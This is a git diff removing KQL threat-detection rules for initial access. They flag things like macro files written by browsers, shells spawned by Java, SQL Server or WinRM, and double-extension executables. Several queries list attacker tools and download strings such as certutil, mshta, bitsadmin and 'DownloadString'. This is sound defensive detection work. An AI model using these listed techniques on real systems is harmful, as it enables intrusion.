-// Description: Detects the creation of a new office macro files on the systems via an application (browser, mail client).
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where ((FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") or (FolderPath contains ".docm:Zone" or FolderPath contains ".dotm:Zone" or FolderPath contains ".xlsm:Zone" or FolderPath contains ".xltm:Zone" or FolderPath contains ".potm:Zone" or FolderPath contains ".pptm:Zone")) and (InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")
\ No newline at end of file
diff --git a/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Initial Access/Phishing_Pattern_ISO_in_Archive.kql b/Initial Access/Phishing_Pattern_ISO_in_Archive.kql
deleted file mode 100644
index 12c62ad9..00000000
--- a/Initial Access/Phishing_Pattern_ISO_in_Archive.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/07
-// Level: high
-// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
-// Tags: attack.initial_access, attack.t1566
-DeviceProcessEvents
-| where (FolderPath endswith "\\isoburn.exe" or FolderPath endswith "\\PowerISO.exe" or FolderPath endswith "\\ImgBurn.exe") and (InitiatingProcessFolderPath endswith "\\Winrar.exe" or InitiatingProcessFolderPath endswith "\\7zFM.exe" or InitiatingProcessFolderPath endswith "\\peazip.exe")
\ No newline at end of file
diff --git a/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql b/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql
deleted file mode 100644
index 3c74a001..00000000
--- a/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (rule), Elastic (idea)
-// Date: 2022/10/21
-// Level: medium
-// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
-// Tags: attack.t1566, attack.t1566.001, attack.initial_access, attack.t1574, attack.t1574.001, attack.defense_evasion
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-"))))
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql b/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql
deleted file mode 100644
index 23d22f38..00000000
--- a/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql	
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/08
-// Level: medium
-// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
-Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
-Use this rule to detect instances of older versions of Anydesk using the compromised certificate
-This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
-
-// Tags: attack.execution, attack.initial_access
-DeviceProcessEvents
-| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall")))
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql b/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql
deleted file mode 100644
index e2ed740c..00000000
--- a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/11
-// Level: medium
-// Description: Detects ScreenConnect program starts that establish a remote access to a system.
-// Tags: attack.initial_access, attack.t1133
-DeviceProcessEvents
-| where ProcessCommandLine contains "e=Access&" and ProcessCommandLine contains "y=Guest&" and ProcessCommandLine contains "&p=" and ProcessCommandLine contains "&c=" and ProcessCommandLine contains "&k="
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql b/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql
deleted file mode 100644
index e7f24392..00000000
--- a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jason Rathbun (Blackpoint Cyber)
-// Date: 2024/02/26
-// Level: high
-// Description: Detects potential web shell execution from the ScreenConnect server process.
-// Tags: attack.initial_access, attack.t1190
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe"
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql b/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql
deleted file mode 100644
index 700bc666..00000000
--- a/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Josh Nickels, Qi Nan
-// Date: 2024/03/11
-// Level: low
-// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
-Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
-
-// Tags: attack.initial_access, attack.t1133
-DeviceProcessEvents
-| where ProcessCommandLine endswith "TeamViewer_Desktop.exe --IPCport 5939 --Module 1" and FolderPath =~ "TeamViewer_Desktop.exe" and InitiatingProcessFolderPath =~ "TeamViewer_Service.exe"
\ No newline at end of file
diff --git a/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql b/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 534b99c8..00000000
--- a/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
-// Date: 2021/12/17
-// Level: medium
-// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql b/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql
deleted file mode 100644
index b669d6d5..00000000
--- a/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye Team, wagga
-// Date: 2020/12/11
-// Level: high
-// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
deleted file mode 100644
index b9990b32..00000000
--- a/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/04
-// Level: critical
-// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Double_Extension_File_Execution.kql b/Initial Access/Suspicious_Double_Extension_File_Execution.kql
deleted file mode 100644
index 61a0e484..00000000
--- a/Initial Access/Suspicious_Double_Extension_File_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/06/26
-// Level: critical
-// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
-// Tags: attack.initial_access, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".doc.exe" or ProcessCommandLine contains ".docx.exe" or ProcessCommandLine contains ".xls.exe" or ProcessCommandLine contains ".xlsx.exe" or ProcessCommandLine contains ".ppt.exe" or ProcessCommandLine contains ".pptx.exe" or ProcessCommandLine contains ".rtf.exe" or ProcessCommandLine contains ".pdf.exe" or ProcessCommandLine contains ".txt.exe" or ProcessCommandLine contains "      .exe" or ProcessCommandLine contains "______.exe" or ProcessCommandLine contains ".doc.js" or ProcessCommandLine contains ".docx.js" or ProcessCommandLine contains ".xls.js" or ProcessCommandLine contains ".xlsx.js" or ProcessCommandLine contains ".ppt.js" or ProcessCommandLine contains ".pptx.js" or ProcessCommandLine contains ".rtf.js" or ProcessCommandLine contains ".pdf.js" or ProcessCommandLine contains ".txt.js") and (FolderPath endswith ".doc.exe" or FolderPath endswith ".docx.exe" or FolderPath endswith ".xls.exe" or FolderPath endswith ".xlsx.exe" or FolderPath endswith ".ppt.exe" or FolderPath endswith ".pptx.exe" or FolderPath endswith ".rtf.exe" or FolderPath endswith ".pdf.exe" or FolderPath endswith ".txt.exe" or FolderPath endswith "      .exe" or FolderPath endswith "______.exe" or FolderPath endswith ".doc.js" or FolderPath endswith ".docx.js" or FolderPath endswith ".xls.js" or FolderPath endswith ".xlsx.js" or FolderPath endswith ".ppt.js" or FolderPath endswith ".pptx.js" or FolderPath endswith ".rtf.js" or FolderPath endswith ".pdf.js" or FolderPath endswith ".txt.js")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql b/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql
deleted file mode 100644
index 2b34c9c1..00000000
--- a/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/01
-// Level: high
-// Description: Detects a suspicious program execution in Outlook temp folder
-// Tags: attack.initial_access, attack.t1566.001
-DeviceProcessEvents
-| where FolderPath contains "\\Temporary Internet Files\\Content.Outlook\\"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_File_Drop_by_Exchange.kql b/Initial Access/Suspicious_File_Drop_by_Exchange.kql
deleted file mode 100644
index 6f40640f..00000000
--- a/Initial Access/Suspicious_File_Drop_by_Exchange.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/04
-// Level: medium
-// Description: Detects suspicious file type dropped by an Exchange component in IIS
-// Tags: attack.persistence, attack.t1190, attack.initial_access, attack.t1505.003
-DeviceFileEvents
-| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_HH.EXE_Execution.kql b/Initial Access/Suspicious_HH.EXE_Execution.kql
deleted file mode 100644
index cd21df94..00000000
--- a/Initial Access/Suspicious_HH.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_HWP_Sub_Processes.kql b/Initial Access/Suspicious_HWP_Sub_Processes.kql
deleted file mode 100644
index 7c00588f..00000000
--- a/Initial Access/Suspicious_HWP_Sub_Processes.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/24
-// Level: high
-// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
-// Tags: attack.initial_access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
-DeviceProcessEvents
-| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql b/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
deleted file mode 100644
index 039ecce5..00000000
--- a/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
-// Tags: attack.initial_access, attack.t1190, attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql b/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql
deleted file mode 100644
index cf718847..00000000
--- a/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
-// Date: 2022/10/21
-// Level: high
-// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
-// Tags: attack.t1566, attack.t1566.001, attack.initial_access
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\onenote.exe" and (((ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".pif" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd") and FolderPath endswith "\\explorer.exe") or ((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) and (not(((ProcessCommandLine endswith "-Embedding" and FolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and FolderPath endswith "\\FileCoAuth.exe") or (ProcessCommandLine endswith "-Embedding" and FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"))))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 7ac4d66c..00000000
--- a/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Florian Roth
-// Date: 2021/12/17
-// Level: high
-// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql b/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql
deleted file mode 100644
index 156ae6e7..00000000
--- a/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Markus Neis
-// Date: 2021/05/20
-// Level: high
-// Description: Detects suspicious processes including shells spawnd from WinRM host process
-// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
deleted file mode 100644
index a6b5d758..00000000
--- a/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/22
-// Level: high
-// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/Initial Access/Terminal_Service_Process_Spawn.kql b/Initial Access/Terminal_Service_Process_Spawn.kql
deleted file mode 100644
index 0e46fcfe..00000000
--- a/Initial Access/Terminal_Service_Process_Spawn.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/05/22
-// Level: high
-// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
-// Tags: attack.initial_access, attack.t1190, attack.lateral_movement, attack.t1210, car.2013-07-002
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Initial Access/Unusual_Child_Process_of_dns.exe.kql b/Initial Access/Unusual_Child_Process_of_dns.exe.kql
deleted file mode 100644
index 3866f302..00000000
--- a/Initial Access/Unusual_Child_Process_of_dns.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// Tags: attack.initial_access, attack.t1133
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\conhost.exe"))
\ No newline at end of file
diff --git a/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql b/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql
deleted file mode 100644
index 5cd09102..00000000
--- a/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Elastic (idea)
